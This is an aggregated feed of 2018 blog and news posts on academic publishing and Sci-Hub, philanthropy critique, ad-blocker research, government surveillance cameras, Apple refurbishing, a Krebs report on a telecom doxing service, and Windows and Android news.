This week, it was followed by a similar call from the European University Association (EUA), which represents over 800 higher education institutions in 47 countries throughout Europe.

In a letter (pdf) to the European Commission, the organization shares its concern about the lack of transparency and competition in Europe’s academic publishing sector, mentioning Elsevier and similar publishers.

One of the main frustrations is that researchers and universities provide the manpower and articles for these publishers, work that’s often funded with public money. This is then sold back to them by the publishers at high prices.

Or as EUA puts it:

“As a well-known allegory says: ‘Imagine a farmer who owns, feeds and milks his cow in order to give away the milk for free to a dairy company – and then finally buys it back in a milk carton at a very high price’. This is the business model of big research publishers.”

While publishers such as Elsevier use copyrights to protect and exploit their work, the nature of the “competition” issue is more complex.

Jonathan Tennant, who filed the first complaint with the EU Anti-Competition Authority, tells TorrentFreak that competition is hard to achieve when every academic article is unique and valuable. The articles are not substitutable, you either have access to it or you don’t.

The second problem is that Elsevier and others keep their pricing agreements secret, often through non-disclosure agreements, which is widely seen as an anti-competitive practice.

“Both of these things together, as well as issues to do with copyright, ‘marketplace’ concentration, obscenely high profits, and vendor lock-in all create an unsuitable ‘market’ around scholarly publishing, which has a negative impact across the entire research sector,” Tennant tells us.

Tennant and Brembs don’t provide any recommendations in their report. They’re leaving it up to the European Commission to decide what’s appropriate, but they believe that banning non-disclosure clauses and providing more transparency are two possible steps.

In an ideal world, one could argue that all academic research should be available for free. In the current system, many researchers don’t have access to some of the research in their field due to financial reasons, which hinders the progress of science.

This is also the main reason why Alexandra Elbakyan started the pirate research library Sci-Hub several years ago. Many researchers rely on it as a source, but Tennant says that he has some sort of love-hate relationship with the controversial pirate library.

“I think what Alexandra and Sci-Hub have done is phenomenal in emphasing the incredible dysfunction in research access from a greedy corporate publishing sector. It has demonstrated that access to knowledge is simple to provide.

“I think it also helps to level the playing field, from an industry whose business model is based on knowledge discrimination based on elite/financial status. For these things, and for being a symptom of a broken industry, I think it is wonderful,” he adds.

However, Tennant argues that it has also had some negative consequences. As founder of Open Science MOOC, he is a strong supporter of Open Access research, where papers are published without paywalls, and believes Sci-Hub may hinder the progress of this movement.

“Because Sci-Hub provides a simple, easy shortcut to free access (not Open Access), it removes some of the incentives for researchers to engage with Open Access in a more sustainable manner. For example, by self-archiving their work for free,” he notes.

That said, Tennant doesn’t think that terms such as ‘piracy’ and ‘theft’ necessarily apply to Sci-Hub. At least, not any more than it could apply to some of the major publishers themselves.

“Sometimes I think that it is the scholarly publishing industry themselves who are the thieves, blackmailing content/copyright from researchers and then preventing access to it as their business model.

“Depends which side of the ethical fence you fall on – private or public gain,” he adds.

Tennant hopes that the European Commission will pick up the ball to end to what he sees as an abuse of power and copyright. Where Sci-Hub tries to “tear down the paywalls” through force, ultimately he believes that it’s more sustainable to change the publishing system itself.

Tennant, who was at a blockchain for science conference this week, has some ideas of his own. Ideally, the future of academic publishing should be open, flexible, and relying on modern technologies.

“My ideal scenario would be a much more granular and lightweight system of continuous editing and review – something like GitHub combined with Stack Exchange combined with Wikipedia,” he says.

“Community-owned, low cost, open source, open everything, sustainable, inherently reproducible, less biased, non-profit, collaborative, instantaneous, fair, and equitable.

“Something like that would be inherently easy to create, should we start again from scratch today,” Tennant concludes.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

11:14

Kickstarting a Da Vinci-inspired, programmable, mechanical drawing robot-arm [Cory Doctorow – Boing Boing]

Robert Sabuda (previously) writes, "It has long been a dream of the Leonardo da Vinci Robot Society to bring one of the Renaissance Master’s creations back to life. 2019 is the 500th anniversary of da Vinci’s death and the Society has chosen to honor his memory and celebrate his life through one of his best known inventions - the Robot Knight. This robot is an early proto-computer android whose read-only programmable memory allowed it to perform many actions. And it was also rumored that the robot’s arm could also perform an extremely complex task…draw a picture!"

"The Society has hired me to unlock the secrets of da Vinci’s robotic arm. The final result, in the form of a kit, is now available to you as da Vinci’s Drawmaton. Made only of wood and a few pieces of metal, this ancestor of the programmable computer, is capable of reading 1kb of analog memory via wooden “petalos” which, to da Vinci, resembled the petals of flowers. The programming “petalos” are easily switched out so the Drawmaton can draw an endless variety of single line images. A few turns of the hand knob completes a full rotation of the programming “petalos” and the drawing is complete. You can insert your own drawing tool into the robot’s hand, place any paper into the draw area, turn the knob and the drawing is revealed. Program your own images to create custom “petalos” which will draw your own masterpieces!"

Sabuda is an eminent mechanical engineer who created some of my favorite pop-up books. The Drawmaton comes with three different plotter-arms: a robot-hand, a skeletal hand, and a mailed fist. The engineering is incredibly clever, and the video demo is mesmerizing.

The project does not give any details of similar projects that the participants have pulled off in the past, which makes this on the riskier end for Kickstarters. Prices range from about $100-about $180, depending on which hand you want and whether you want two or eight "petalo" program discs.

Da Vinci's Drawmaton [The Leondardo da Vinci Robot Society/Kickstarter]

Winners Take All: Modern philanthropy means that giving some away is more important than how you got it [Cory Doctorow – Boing Boing]

Anand Giridharadas was a former McKinsey consultant turned "thought leader," invited to the stages of the best "ideas festivals" and to TED (twice), the author of some very good and successful books, and as a kind of capstone to this career, he was named a fellow to the Aspen Institute, an elite corps of entrepreneurs who are given institutional support and advice as they formulate "win-win" solutions to the world's greatest problems, harnessing the power of markets to lift people out of poverty and oppression.

But the deeper Giridharadas got into this new role, the more uncomfortable he became with it. On the night he was to give a valedictory address to an audience of business leaders, finance leaders, and other members of the ruling class, he abandoned the "Aspen consensus" and instead give a scorching and excoriating talk about the structural failure of "win-win" as a way of thinking about the world's problems.

Giridharadas's point was that the business elites who were gathered to "give back" and "solve the big problems" were some of the most egregious contributors to those problems. They had looted the world's treasuries, shut down businesses and shipped jobs to low-wage, low-regulation free trade zones, gutted public services and replaced them with low-bidder private sector contractors, and had done so while formulating and promulgating the philosophy that business leaders' individual judgment about the provision of public services were always to be preferred to those policies set by democratically elected politicians.

The speech was -- obviously -- divisive. Giridharadas had expected to be pilloried for his views, and he was, to an extent. A hedge-fund millionaire sought him out later to call him an asshole, people glared at him from across the Institute's bar. But there were also people who applauded vigorously, billionaires who thanked him for finally articulating the doubt that had lurked in their hearts.

It was the start of a project that culminated in the publication of last summer's Winners Take All: The Elite Charade of Changing the World, a beautifully written "argument with Giridharadas's friends" about the problems with their worldview. As Giridharadas says, being inside the system gives you special insight when it comes to criticizing it, and Giridharadas is deep inside the system.

Winners Take All moves all the way up and down the stack of today's plutocratic philanthropy industry, talking to NGO managers, billionaire donors, critics, cheerleaders, superstars (Bill Clinton granted Giridharadas a wide-ranging interview about his extraordinary transition for a man who led the most powerful nation on Earth to someone committed to bypassing nations in favor of private philanthropy enacted by multinational corporations and hereditary billionaires), and, of course, critics.

The result is a comprehensive and devastating critique of elite giving, and a sharp articulation of its core philosophy: that it doesn't matter how you made your money, provided that you do some good with it once it's in your anonymous, offshore, tax-free bank-account. Giridharadas's shows how this belief gives the rich cover to continue actions that are worsening the problems that they are nominally concerned with solving, and to still think of themselves (and be publicly recognized) as do-gooders rather than the source of our problems.

The private philanthropy model has both ideological and methodological blinkers. Practicioners of "marketworld" philanthropy approach every problem like a McKinsey consultant, bringing the management consultant's toolkit and specialized, jargony vocabulary with them. When "the protocol" of the management consultants are the only tool at your disposal, parts of problems that the protocol can't solve are downranked to oblivion, as are the methods that might tackle them.

I live on the periphery of the world Giridharadas describes: I, too, get invited to "ideas" festivals, and while I generally use my time there to decry corruption and to make explicit connections between bad policy and plutocratic wealth, I've also seen enough of the people Giridharadas is talking about to agree with him when he says that many of these people are kind, kind-hearted, and also secretly worried that the "market-world" approach to solving problems will never solve a problem that challenges market-world, or its beneficiaries (like them).

Giridharadas doesn't speculate about whether market-world's givers have their hearts in the right place because he wants to know whether they can be forgiven for their participation in the system -- but rather, whether they can be convinced to do something about it.

All through Giridharadas's book, he meets people high and low, rich and powerful or poor and scrappy, who understand that we're at a breaking point. Donald Trump campaigned on the idea that elite do-goodism was just cover for perpetuation of the system (nevermind that he also planned on perpetuating the system), and he resonated with people. Ever since late nineties, when Reagan-era deregulation had pervaded deeply into the system and wages started to stagnate, organized labor started to crumble, and policies like the WTO were consummated to the benefit of capital and the cost of the world, its climate and its people, there's been a mounting sense that we are on a collision course with disaster.

As inequality mounts, our weakened governments are unable to enact policies that upset plutocrats' apple carts. American health care, education, infrastructure, and (of course) its climate are unravelling so fast we can actually see it happen. People are turning to far-right movements and falling prey to charlatans as they seek a way out, or at least an explanation.

Giridharadas's book comes at a timely moment, when the problem is being named: winner-take-all capitalism, untethered by democratic controls, where how you make your money isn't as important as how you give some of it back. Giridharadas identifies a moment when we have to stop talking about "lack of opportunity" and start talking about oppression and inequality. To stop talking merely about solutions and start asking ourselves about causes.

Winners Take All: The Elite Charade of Changing the World [Anand Giridharadas/Knopf]

10:14

Get your memo read [Seth's Blog]

The unanticipated but important memo has a difficult road. It will likely be ignored.

The difficult parts:

a. no one is waiting to hear from you

b. you need to have the clarity to know who it’s for, what’s it for and precisely what you want them to do

c. you have to have the guts to leave out everything that isn’t part of (b)

Consider a memo that was left outside my door at a hotel recently. The management distributed 1000 of them and perhaps ten people read it and took action.

Here’s what to keep in mind:

  1. Pattern interrupt. When was the last time you listened to the seat belt announcement on an airplane? We ignore it because we’ve been trained to ignore it. When you show up in a place, at a time, with a format that we’ve been trained to ignore, we’ll ignore you.
  2. Write a story. You seek engagement. Talk about me. About you, about yesterday, today and tomorrow. If you earn the first sentence, you’ll need to sell me on reading the second sentence.
  3. Frame the story. Help me compare it to something. Create urgency. Make it about me, my status, my needs.
  4. Chunk the message. How many things are you trying to say? (Hint: two might be too many). Let me scan instead of study.
  5. Include a call to action. Right here, right now.

Here’s a before and after of what inspired me.

08:14

Researchers claim to have permanently neutralized ad-blocking's most promising weapons [Cory Doctorow – Boing Boing]

Last year, Princeton researchers revealed a powerful new ad-blocking technique: perceptual ad-blocking uses a machine-learning model trained on images of pages with the ads identified to make predictions about which page elements are ads to block and which parts are not.

However, a new paper from a group of Stanford and CISPA Helmholtz Center researchers reveals a powerful machine learning countermeasure that, they say, will permanently tilt the advantage toward advertisers and away from ad-blockers.

The team revealed a set of eight techniques to generate adversarial examples of slightly modified ads that completely flummoxed the perceptual ad-blocker's model: from overlaying a transparent image to modifying a few pixels in the logo used to demarcate an ad.

What's more, the team showed that they could cause the perceptual blocker's model to erroneously identify a page's actual content as an ad and block it, while leaving the ads unblocked.

The team says that these techniques will always outrace the ability of perceptual blocking models to detect them, suggesting that perceptual blocking may be a dead letter.

We note that detection of adversarial examples [27, 47]—a simpler problem in principle but also one far from solved [14]— may not be applicable to ad-blockers. Indeed, ad-blockers face both adversarial false-positives and false-negatives, so merely detecting a perturbation does not help in decision-making. This challenging threat model also applies in part to ad-blockers based on non-visual cues, e.g., ML-based ad-blockers that use similar features as filter lists [11, 29, 36]. None of these have yet been evaluated against adaptive adversaries.

Moreover, by virtue of not relying on visual cues, these models are presumably easier to attack in ways that are fully transparent to users (e.g., switching ad domains)

Ad-versarial: Defeating Perceptual Ad-Blocking [Florian Tramèr, Pascal Dupré, Gili Rusak, Giancarlo Pellegrino and Dan Boneh/Arxiv]

Researchers Defeat Most Powerful Ad Blockers, Declare a ‘New Arms Race’ [Daniel Oberhaus/Motherboard]

(via /.)

ICE and the DEA have secretly hidden cameras in some streetlights [Cory Doctorow – Boing Boing]

Government procurement data reveals that US Immigration and Customs Enforcement and the Drug Enforcement Agency have each spent tens of thousands of dollars on products from Houston's Cowboy Streetlight Concealments LLC, which specializes in fake streetlight housings designed to conceal surveillance cameras.

Since June, the DEA has spent $22,000 with Cowboy; ICE's total is about $28K. Neither the government agencies nor Cowboy Streetlight Concealments will reveal where or how the hidden camera housings were used.

The DEA is currently advertising for competitive bids for "concealments made to house network PTZ [Pan-Tilt-Zoom] camera, cellular modem, cellular compression device." In the absence of a competitive bid, it will award the contract to Oregon's Obsidian Integration LLC; Obsidian recently provided concealed cameras to the Jersey City PD.

The DEA also uses traffic barrels and digital speed displays to to conceal its covert cameras.

Christie Crawford, who owns Cowboy Streetlight Concealments with her husband, a Houston police officer, said she was not at liberty to discuss the company’s federal contracts in detail.

“We do streetlight concealments and camera enclosures,” Crawford told Quartz. “Basically, there’s businesses out there that will build concealments for the government and that’s what we do. They specify what’s best for them, and we make it. And that’s about all I can probably say.”

However, she added: “I can tell you this—things are always being watched. It doesn’t matter if you’re driving down the street or visiting a friend, if government or law enforcement has a reason to set up surveillance, there’s great technology out there to do it.”

The DEA and ICE are hiding surveillance cameras in streetlights [Justin Rohrlich & Dave Gershgorn/Quartz]

(Image: Cowboy Concealments; twistedrhye, Cryteria, CC-BY)

Apple's war on repair continues: Amazon now bans refurb Apple products from third parties [Cory Doctorow – Boing Boing]

Apple has long understood that hardware products that last a long time result in falling unit sales, as customers opt to keep their old machines instead of buying the latest models; that's part of why the company led the charge that killed every single Right to Repair bill introduced last year -- less repairs leads to more "recycling," which is Applespeak for dropping used units into giant shredders without harvesting any usable parts first.

Every year, refurbishers rescue thousands of used Apple products from the e-waste streams, and every year, Apple finds new ways to frustrate their efforts.

The latest wrinkle: Apple has gotten Amazon to agree to ban the sale of refurbished Apple products except those that come from Apple directly.

Aaron Perzanowski, a law professor at Case Western Reserve University and coauthor of The End of Ownership, told me in an email that this decision is a dangerous infringement of ownership rights.

“Wow. This is a very troubling development,” he said. “Given Amazon’s dominance as an online retail marketplace, its decision to disregard the first sale rights of resellers will significantly limit consumer choice. The fact that this move was demanded by Apple makes it even more problematic. What we see here are the world’s two most valuable companies engaging in a coordinated assault on the lawful resale of consumer devices.”

The United States Supreme Court has ruled that people who legally own a product may legally resell it, and federal law protects that right under something known as the “first sale doctrine,” which says that copyright holders give up their copyright to individual copies of a work once it is sold: “the first sale doctrine, codified at 17 U.S.C. § 109, provides that an individual who knowingly purchases a copy of a copyrighted work from the copyright holder receives the right to sell, display, or otherwise dispose of that particular copy, notwithstanding the interests of the copyright owner,” the US Department of Justice explains.

“The first sale doctrine has never required an owner to get permission to sell their property,” Perzanowski added. “But Amazon is leveraging its power over its marketplace to give Apple power that the courts and Congress never have and never would.”

"It’s kind of mind boggling to think that a brand would be able to restrict sale of used products"

Amazon Is Kicking All Unauthorized Apple Refurbishers Off Amazon Marketplace [Jason Koebler/Motherboard]

(Image: John Bumstead)

Gorgeous, illustrated Japanese fireworks catalogs from the early 1900s [Cory Doctorow – Boing Boing]

The Yokohama Board of Education has posted scans of six fantastic catalogs from Hirayama Fireworks and Yokoi Fireworks, dating from the early 1900s. The illustrated catalogs are superb, with minimal words: just beautiful colored drawings depicting the burst-pattern from each rocket.

(via Kottke)

07:28

Canadian regulator wants your comments on ISP rules requiring simple contracts, easy switching [Cory Doctorow – Boing Boing]

The CRTC has proposed a code of conduct for Canadian ISPs that would "easy to understand, and make it easier for Canadians to switch providers to take advantage of competitive offers" -- but the new plan doesn't address the epidemic of fraudulent promises made by Canadian ISPs (that's part of a separate, ongoing government inquiry). Canadians hate their ISPs, with complaints rising by 36% in 2017. Canada has one of the world's most concentrated telcoms sectors, with the big cable and phone companies routinely gobbling up each other (and many media companies) with nary a peep from Canada's asleep-at-the-wheel competition regulators.

You can comment on the proposal here.

(Thanks, Alex!)

(Image: Coastal Elite, CC-BY-SA)

Video: Gangstagrass's first live video: authentic bluegrass/hip-hop mashup [Cory Doctorow – Boing Boing]

Rench writes, "Relix magazine just premiered this live video of Gangstagrass (previoulsy), the pioneers of authentically mixed bluegrass and hip-hop. The energy crackles on this captivating stage performance. Can't decide which is hotter, the emcees dynamic flow or the banjo and dobro players going into overdrive on the solos.

7-Eleven accused of weaponizing ICE raids to shed troublesome franchisees [Cory Doctorow – Boing Boing]

Most of America's 9,000 7-Eleven stores are owned by franchisees, many of them immigrants; the owners' contracts with 7-Eleven corporate allows the company to pull their franchises if they violate US law.

The current CEO of 7-Eleven is Joe DePinto, a West Point grad who got the job in 2005 and has spent his tenure slowly tightening the screw on franchisees, demanding business practices that return more profit to corporate HQ at the expense of the independent operators. As the franchisees have felt the sting, they've fought back, suing the company over DePinto's policies.

DePinto has become legendary for his dirty tricks campaign to get rid of his least-favored franchisees, from hiring private eyes to making secret recordings.

Now the franchisees allege that DePinto has started snitching on his own franchisees to ICE, directing government immigration raids against 7-Eleven stores. If these franchise owners are found to have illegally hired undocumented immigrants, DePinto can cancel their franchise agreements and kick them out of the business and take over their stores.

The evidence is circumstantial and 7-Eleven denies it, but ICE's raids on 7-Eleven stores have targeted owners who have made trouble for the company.

When Carter Anderson paused and asked if anyone had questions, Serge Haitayan took a microphone. He owns a 7-Eleven on a highway lined by grape farms in Fresno, Calif. Last year he joined Sandhu in the lawsuit alleging 7-Eleven was wrongly treating them like employees. On July 16 of this year, three federal agents walked into the little store he’s operated for 28 years, giving him three days to produce employee records dating back a year. He did that, and he hasn’t heard from ICE since.

“Why is immigration targeting 7-Eleven?” Haitayan asked Carter Anderson, drawing a rumbling of support. “Why?”

Carter Anderson paused, smiling nervously, as she scanned the crowd. “I understand getting this question,” she said. “But I cannot specifically answer this question.”

Haitayan continued. “All I hear is 7-Eleven being raided. It seems to be we are the only ones being targeted by ICE. Why?”

“I’m sorry,” she said.

The War Inside 7-Eleven [Lauren Etter/Bloomberg]

(via Super Punch)

(Image: OmiAsad, CC-BY)

01:42

Junichi Uekawa: Trying out crostini on chromebook plus (kevin). [Planet Debian]

Trying out crostini on chromebook plus (kevin). It's an aarch64 environment, some packages are missing because of that. Feels much slower compared to termux on the same machine especially when I am installing packages, but maybe because apt is completely different.

00:56

I returned to Windows 10 Mobile in 2018 [OSNews]

The mobile platform I chose was put to bed last year, with no new hardware or software features planned. As such, when Microsoft's Corporate Vice President of Windows 10, Joe Belfiore, confirmed that Windows 10 Mobile was no longer of "focus" to Microsoft, I threw in the towel. I've used both iOS and Android devices since then, and I can't say I've found my new home yet. Nothing I've used has been a full-time replacement for my Windows phones. So, after over a year of hunting for my next true mobile companion, I've temporarily given up the search to go back "home". I jokingly called this Windows 10 Mobile's last voyage, but in a funny way, it's true. Outside of security updates, Windows 10 Mobile is no longer being maintained, meaning there are some issues that are starting to arise.

Windows Phone 7/8 was the only modern smartphone operating systems I've truly ever liked. The design, the applications, the fluidity - it felt like it was designed for me. I found it a joy to use, but it quickly became apparent that few developers were building applications for the platform, and the general public was never interested. This article is interesting, as it shows that using Windows 10 Mobile is like today.

I feel like I should snap up an HP Elite x3 for my collection of devices running dead platforms.

APEX furthers the Android modularization started by Treble [OSNews]

At a technical level, APEX has been compared to Magisk, which works by mounting folders into the system partition at boot, rather than modifying the system partition directly (which is detectable). APEX appears to extend that same functionality over into core Android packages, separating out things like the Android Runtime into their own packages, separate from the system partition. That means they can be individually and separately updated from the system image. It's possible that modularized OEM modifications could then be distributed on top of a Google-maintained system image - basically meaning the version of Android itself on a given phone could potentially be updated by Google, but the bits responsible for an OEM skin could be present, updated, and maintained as separate components. That's not to mention how it could ease ROM development, as Treble has.

It's good to see Google working to go beyond Treble, because the cold and harsh facts are that Treble hasn't made any serious dent in the update problem at all. The problem is as big as it's ever been.

00:07

What's new for WSL in the Windows 10 October 2018 Update [OSNews]

On October 2, 2018, Microsoft announced that the availability of the Windows 10 October 2018 Update. This post will cover what you can expect to see in WSL for the October 2018 Update, Windows 10 version 1809, and from recent Windows Insiders builds. You can find additional information on our detailed release notes.

Mind you, as you can see in the previous news item, 1809 was pulled and hasn't been rereleased yet. I'm not entirely sure why this blog post detailing these changes is still up without acknowledging that.

Microsoft's silence on the Windows 10 1809 delay is deafening [OSNews]

Microsoft skipped over Release Preview with Windows 10 version 1809, and four days later, the update was pulled from Windows Update. This was mainly due to some users' files being deleted upon upgrading. Moreover, it turned out that the issue had been reported to the Feedback Hub, but it hadn't been upvoted enough times for anyone to notice. The company published a blog post a few days after that, explaining the issue and saying that you'll now be able to indicate severity of a bug in a Feedback Hub report. There was a slight apology, and a sign that Microsoft will do at least the bare minimum to make sure that this doesn't happen again. Microsoft hasn't said a word about it since.

Not a good few weeks for Windows Update and related services.

Friday, 09 November

23:21

look for the helpers [WIL WHEATON dot NET]

I feel like words are cheap and sentiment is empty, but I can’t stop thinking about the people who have lost homes due to the fires that are raging all […]

22:21

Friday Squid Blogging: Australian Fisherman Gets Inked [Schneier on Security]

Pretty good video.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.

21:42

Bug Bounty Hunter Ran ISP Doxing Service [Krebs on Security]

A Connecticut man who’s earned bug bounty rewards and public recognition from top telecom companies for finding and reporting security holes in their Web sites secretly operated a service that leveraged these same flaws to sell their customers’ personal data, KrebsOnSecurity has learned.

In May 2018, ZDNet ran a story about the discovery of a glaring vulnerability in the Web site for wireless provider T-Mobile that let anyone look up customer home addresses and account PINs. The story noted that T-Mobile disabled the feature in early April after being alerted by a 22-year-old “security researcher” named Ryan Stevenson, and that the mobile giant had awarded Stevenson $1,000 for reporting the discovery under its bug bounty program.

The Twitter account @phobia, a.k.a. Ryan Stevenson. The term “plug” referenced next to his Twitch profile name is hacker slang for employees at mobile phone stores who can be tricked or bribed into helping with SIM swap attacks.

Likewise, AT&T has recognized Stevenson for reporting security holes in its services. AT&T’s bug bounty site lets contributors share a social media account or Web address where they can be contacted, and in Stevenson’s case he gave the now-defunct Twitter handle “@Phoobia.”

Stevenson’s Linkedin profile — named “Phobias” — says he specializes in finding exploits in numerous Web sites, including hotmail.com, yahoo.com, aol.com, paypal.com and ebay.com. Under the “contact info” tab of Stevenson’s profile it lists the youtube.com account of “Ryan” and the Facebook account “Phobia” (also now deleted).

Coincidentally, I came across multiple variations on this Phobia nickname as I was researching a story published this week on the epidemic of fraudulent SIM swaps, a complex form of mobile phone fraud that is being used to steal millions of dollars in cryptocurrencies.

Unauthorized SIM swaps also are often used to hijack so-called “OG” user accounts — usually short usernames on top social network and gaming Web sites that are highly prized by many hackers because they can make the account holder appear to have been a savvy, early adopter of the service before it became popular and before all of the short usernames were taken. Some OG usernames can be sold for thousands of dollars in underground markets.

This week’s SIM swapping story quoted one recent victim who lost $100,000 after his mobile phone number was briefly stolen in a fraudulent SIM swap. The victim said he was told by investigators in Santa Clara, Calif. that the perpetrators of his attack were able to access his T-Mobile account information using a specialized piece of software that gave them backdoor access to T-Mobile’s customer database.

Both the Santa Clara investigators and T-Mobile declined to confirm or deny the existence of this software. But their non-denials prompted me to start looking for it on my own. So naturally I began searching at ogusers-dot-com, a forum dedicated to the hacking, trading and sale of OG accounts. Unsurprisingly, ogusers-dot-com also has traditionally been the main stomping grounds for many individuals involved in SIM swapping attacks.

It didn’t take long to discover an account on ogusers named “Ryan,” who for much of 2018 has advertised a number of different “doxing” services — specifically those aimed at finding the personal information of customers at major broadband and telecom companies.

In some of Ryan’s sales threads, fellow forum members refer to him as “Phob” or “Phobs.” In a post on May 27, Ryan says he’s willing to pay or trade for OG accounts under the name “Ryan,” “Ryans”, “RS,” “RMS” or “Stevenson” on any decent sized popular Web site. “hmu [hit me up] in a pm [private message] to talk,” Ryan urged fellow forum members.

The OG User forum account “Ryan” asking fellow members to sell or trade him any major Web site account name that includes the OG username “Ryan” or “Stevenson.”

I found that as late as June 2018 Ryan was offering a service that he claimed was capable of “doxing any usa carrier,” including Verizon, AT&T, Sprint, T-Mobile, MetroPCS and Boost Mobile.

“All I need is the number,” Ryan said of his customer data lookup service, which he sold for $25 per record. “Payment BTC [bitcoin] only.”

For $25 per record, Ryan offered fellow ogusers members the ability to look up customer records tied to any customer of the major U.S. mobile providers.

Very similar offerings were made by Phobia’s alter ego “AOLer” on the sprawling English language online hacking community Hackforums.

I first encountered Stevenson several years back while trying to work out who was responsible for calling in a phony hostage situation and sending a heavily armed police force to our Northern Virginia home in 2013. In a follow-up to that story, Stevenson admitted that he was responsible for the high-profile hack against Wired reporter Mat Honan, who documented how a hacker named Phobia had deleted his Google account and remotely erased all data from his iPhone, iPad and MacBook.

Going by the nickname “Phobiathegod” at the time, Stevenson was then part of a group of young men who routinely hijacked OG account names on Microsoft’s Xbox gaming platform, often using methods that involved tricking customer service people at the target’s mobile provider into transferring the victim’s calls to a number they controlled.

Fast forward to today, and Phobia’s main Twitter account (pictured at the top of this post) includes the phrase “the plug” next to his profile. In SIM swapping circles, a “plug” is hacker slang for an employee at a mobile phone store who can be bribed, tricked or blackmailed into assisting with an unauthorized SIM swap.

Reached via instant message on LinkedIn, Stevenson acknowledged running the ISP doxing services, but said his account on the OGusers forum was since banned and that hardly anyone took him up on his offer anyway.

“I shouldn’t have made the threads even though no one really asked for anything,” he said. “I’m on the good side. But its almost 2019 and I need to find a new hobby I can’t be bothered to look for breaches/vulns, haven’t got 1 job offer or recommendation yet.”

Asked about “the plug” reference in his Twitter profile, Stevenson suddenly stopped replying. Not long after that, the @Phobia Twitter account was deactivated.

Stevenson denied being involved in SIM swapping attacks, but it is clear Phobia was fairly tight with many people who are or until recently were at the center of this scene. In July 2018, authorities in California arrested 20-year-old Boston resident Joel Ortiz for allegedly conducting dozens of fraudulent SIM swaps and stealing at least $5 million worth of cryptocurrency from victims.

Like Phobia, Ortiz had a presence on OGusers and had acquired some of the most OG social media accounts available, including the Twitter and Instagram account names with the number zero (@0), and the OG Youtube accounts “Joel” and “X”.

On Oct 27, 2017, the Youtube account “Joel” published a 4-minute video of Stevenson dancing to a popular rap song in front of the camera. On July 5, 2018, just days before Ortiz was arrested, the Twitter account “0” gave a shout out to @Phobia on Twitter suggesting Phobia was actually tweeting using Ortiz’s “0” account.

21:00

MPAA Considers a ‘Makeover’ As It Faces Shrinking Budget [TorrentFreak]

The Motion Picture Association of America (MPAA) has protected Hollywood’s interest for nearly a century now.

In recent years the organization’s anti-piracy efforts have made the headlines repeatedly. Not just domestically, but around the world, through its site-blocking efforts for example.

Traditionally, the MPAA obtains most of its revenue from the six major Hollywood studios. The latest public filings show that these membership dues totaled nearly $50 million.

This number is significantly less than before, as we reported earlier, but new information suggests that it may drop even further.

As a result of Disney’s acquisition of 20th Century Fox, the MPAA stands to lose one-sixth of its membership dues. Disney promised to pay Fox’s share for another year after the deal is finalized, but what happens next is uncertain.

According to a report from The Information, the MPAA is now discussing a makeover of the organization.

While no crystalized plans have been released, several insiders said that the group is considering accepting new members, including streaming services such as Netflix and Amazon. This would add more revenue, but also broaden the organization’s mandate.

It is unknown how concrete these plans are or whether the MPAA approached potential new members already. Whatever the eventual direction may be, it won’t be an easy task.

“This can’t just be an economic exercise,” one of the people familiar with the discussions told The Information. “It has to be a come-to-Jesus moment.”

Although Amazon and Netflix have a shared interest with Hollywood on some fronts, both have their differences as well. The MPAA has been at odds with major tech companies over the years, companies that are closely aligned with the streaming giants.

That said, Amazon, Netflix, and the MPAA already work together in another anti-piracy initiative. They are all part of the Alliance for Creativity and Entertainment (ACE), which counts 30 companies in total.

The ACE coalition is, in fact, running on the MPAA’s anti-piracy resources, including personnel. That brings up the next makeover option.

If the MPAA can’t continue in its current form and is unable to add more members, whether those are traditional movie studios or streaming providers, some people suggested that it could fold into ACE.

That’s an even more complex path, perhaps, since the MPAA does more than fighting piracy. But in theory, the MPAA could continue as is in a slimmed down version, while its anti-piracy efforts move to ACE.

For now, it’s all just speculation. But it’s clear that the MPAA has more on its mind than fighting pirates.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

20:49

The Pentagon is Publishing Foreign Nation-State Malware [Schneier on Security]

This is a new thing:

The Pentagon has suddenly started uploading malware samples from APTs and other nation-state sources to the website VirusTotal, which is essentially a malware zoo that's used by security pros and antivirus/malware detection engines to gain a better understanding of the threat landscape.

This feels like an example of the US's new strategy of actively harassing foreign government actors. By making their malware public, the US is forcing them to continually find and use new vulnerabilities.

20:14

19:28

Information doesn't want to be free isn't. [wish]

Some e-book stores will send e-books to your kindle via e-mail but don't provide the facility to send them to non-kindle e-mail addresses. I was investigating whether it would be easier to set this up and then automate download from Amazon to my computer for importation into Calibre when I discovered I can no longer download my copy of Information Doesn't want to be free. On selecting "Download and transfer via USB" I am told."No device is eligible for Downloading the selected content". A drop-down menu is provided that lists devices associated with my Amazon account but they are all grayed out.

It looks like Amazon will no longer allow me to download even DRM free content unless I can prove to them that I have an ancient kindle that can't connect directly.

18:42

News Post: Adventure Mode! [Penny Arcade]

Gabe: I’ve dipped my toe into Diablo III many times over the years. I am not much of a PC gamer but when it hit consoles I put a decent amount of time into it. I just picked it up again on the Switch and tried playing a seasonal character in adventure mode which is something I’d never tried before. In past versions of the game you had to beat the entire story to unlock adventure Mode, but the Switch version allows you to jump right into it. I’ve probably started the Diablo III campaign a hundred times, but never gotten all the way to the end. I like the game on the Switch but honestly…

17:56

The kernel pull-request tracker bot [LWN.net]

Since the beginning, one part of the kernel-development task has been watching the mainline to see whether one's work had been merged. That is about to change with the advent of the pull-request tracker bot, which will inform maintainers when one of their pull requests has made it into the mainline. Konstantin Ryabitsev, who put this service together, plans to expand it to other trees once things have settled down.

Link [Scripting News]

Theory why Trump fired Sessions and appointed Whitaker now. They know Mueller is about to issue his report. They wanted to move first, do something, anything, to be able to say they were on top of it. It won’t work, he’s the Keystone Kops president.

How to Get Signed and Personalized Books From Me For the Holidays, 2018 [Whatever]

It’s that time of the year again, and once again I am teaming up with Jay & Mary’s Book Center, my local independent bookseller, to offer signed and personalized books for gift-giving. It’s a great way to get a unique gift for someone you love (even yourself!) while at the same time supporting a fabulous local business that does a fantastic job in its community.

So: How do you get signed and personalized books from me this year? It’s simple:

1. Call Jay & Mary’s at their 800 number (800 842 1604) and let them know you’d like to order signed copies of my books. Please call rather than send e-mail; they find it easier to keep track of things that way.

2. Tell them which books you would like (For example, The Consuming Fire), and what, if any, names you would like the book signed to. If there’s something specific you’d like written in the books let them know but for their sake and mine, please keep it short. Also, if you’re ordering the book as a gift, make sure you’re clear about whose name the book is being signed to. If this is unclear, I will avoid using a specific name.

